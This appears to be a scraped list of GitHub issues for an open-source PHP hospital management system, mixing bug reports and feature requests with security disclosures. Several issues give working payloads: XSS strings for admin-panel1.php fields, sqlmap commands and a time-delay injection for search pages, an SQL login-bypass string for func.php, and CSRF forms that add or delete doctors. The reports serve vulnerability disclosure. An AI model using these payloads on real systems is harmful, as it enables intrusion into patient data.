kishan0725 / hospital-management-system Goto Github PK

I have tried to login using the provided admin login credentials but I am get an error stating wrong username or password. Kindly assist

registration process permit registration of patients with same identity i.e Names, email and phone number

Crafted HTTP packet can delete doctors without being authenticated as receptionist/admin.

Before:

After:

a lot of pages use hardcoded values for mysql connection

Persistent cross-site scripting (XSS) in Hospital Management System v4.0 targeted towards web admin through /admin-panel1.php at via the parameter demail.

Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'demail' parameter to xss payload: <sCrIpT>alert(5555)</ScRiPt>

Proof of concept (Poc)

Please contact me to resolve this issue. I am not going to publish the exploit code here.

Intercept message search and save contents into a text file.

Run SQLmap

Area of concern in messearch.php

Intercept contact info and save contents into a text file(1.txt).

Run SQLmap

python3 .\sqlmap.py -r .\1.txt

Area of concern in contact.php

Hi,

There is a site-wide CSRF vulnerability in every functionality.

Add Doctor

<html>
  <body>
    <form action="http://49f9541dc2b3.ngrok.io/admin-panel1.php" method="POST">
      <input type="hidden" name="doctor" value="test" />
      <input type="hidden" name="special" value="Cardiologist" />
      <input type="hidden" name="demail" value="test&#64;gmail&#46;com" />
      <input type="hidden" name="dpassword" value="testtest" />
      <input type="hidden" name="cdpassword" value="testtest" />
      <input type="hidden" name="docFees" value="123" />
      <input type="hidden" name="docsub" value="Add&#32;Doctor" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Delete Doctor

<html>
  <body>
    <form action="http://localhost/admin-panel1.php" method="POST">
      <input type="hidden" name="demail" value="testbydhakalananda&#64;gmail&#46;com" />
      <input type="hidden" name="docsub1" value="Delete&#32;Doctor" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

I found an SQL Injection in your project
Pls Follow these steps to reproduce:

1. Create a request to 'patientsearch.php':
   
2. Save this request to 1.txt file:
   
3. Run SQLMap for the attack:
   sqlmap -r 1.txt --dbs
   
4. Area of concern in patientsearch.php
   

Add XSS in Prescription as DOCTOR

Login as ADMIN

Persistent XSS upon logging in as ADMIN

Issue in prescribe.php

#1 Messarch.php

#2 appsearch.php

#3 doctorsearch.php

#4 doctorsearch.php

#5 patientsearch.php

Add Doctor info payload to Doctor Special of Add Doctor page to target /admin-panel1.php, then use burpsuite get requests datas, change the 'special' parameter to xss payload: <script>alert(123)</script>
Step to exploit:

1. Navigate to http://hospital.com/admin-panel1.php
2. Click 'Add Doctors ', use burpsuite to insert xss payload in the "special" parameter
3. Click "Add Doctors"

Proof of concept (Poc)：

Add XSS to message section of Contact page to target receptionist/admin.

Log in as receptionist/admin.

1. The appointments which are past the due time are still active. They can either be rescheduled by the docter or the appointment can be simply cancelled by the doctor.
   

Hi there,

I couldn't find a SECURITY.md in your repository and am not sure how to best contact you privately to disclose a security issue.

Can you add a SECURITY.md file with an e-mail to your repository, so that our system can send you the vulnerability details? GitHub suggests that a security policy is the best way to make sure security issues are responsibly disclosed.

Once you've done that, you should receive an e-mail within the next hour with more info.

Thanks! (cc @huntr-helper)

appointment not create

index1.php ----> fun.php

Appointment status in doctor panel should change from "active" to "completed" either after the prescription is given or after the bill is paid by the patient.

The completed appointment should be removed from the doctor panel after the bill is paid.

doctor-panel.php



contact.php

When we register new patient and redirect to admin panel then we can't book appointments.

Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'dpassword' parameter to xss payload: <sCrIpT>alert(7777)</ScRiPt>
Steps to exploit:

1. Navigate to http://hospital.com/admin-panel1.php

2. click 'Add Doctors ', use burpsuite to insert xss payload in the "dpassword" parameter

3. Click "Add Doctors"

Proof of concept (Poc)：

When doctor prescribes new patient, patient's name, id and appointment id is not showing the prescription list. It seems there is some bug in this application.

please help me

Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: <sCrIpT>alert(1234)</ScRiPt>

Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: <sCrIpT>alert(1234)</ScRiPt>

Proof of concept (Poc)：

• remove comments
• tabulate code
• unit tests
• don't use same php file to post actions and get renderization

I found an SQL Injection in your project
Pls Follow these steps to reproduce:

1:In admin panel use feature search doctor:

2: Create a request to 'doctorsearch.php':

3: Save this request to test.txt file:

4: Run SQLMap for the attack:
sqlmap -r test.txt -p doctor_contact

-> Injected

5: Area of concern in doctorsearch.php ( line 11 -> line 17 )

Multiple SQL injections and a XSS vulnerability in Hospital-Management-System v4

A Resuming Table of the Discovered Vulnerabilities:

To reproduce the XSS vulnerability a <script>alert(1)</script> would work. And for the SQL injections, time delay payloads work (such as '+(select*from(select(sleep(20)))a)+')

Go to localhost/admin-panel1.php and you will be able to access the admin dashboard without any authentication.

Hello @kishan0725
Can I contribute to this project by adding new feature to the current project like:
Adding a medicine buying module
Adding payment module
Creating a web interface for the same

would it be fine if I work on it?

VULNERABLE: SQL Injection Authentication Bypass exists in Hospital-Management-System. An attacker can inject query in “/Hospital-Management-System-master/func.php" via the ‘email’ parameters.

• Description: The vulnerability is present in the “/Hospital-Management-System-master/func.php " , and can be exploited throuth a POST request via the ‘email’ parameters.
• Impact: Allow attacker inject query and access , disclosure of all data on the system.
• Suggestions: User input should be filter, Escaping and Parameterized Queries.
• Payload: email =' or 1 limit 0,1#
• File affect:
• 
• Proof of concept (POC):
• Inject payload:
• 
• Bypass authentication success and redirect admin panel
• 

add docker support

in this code.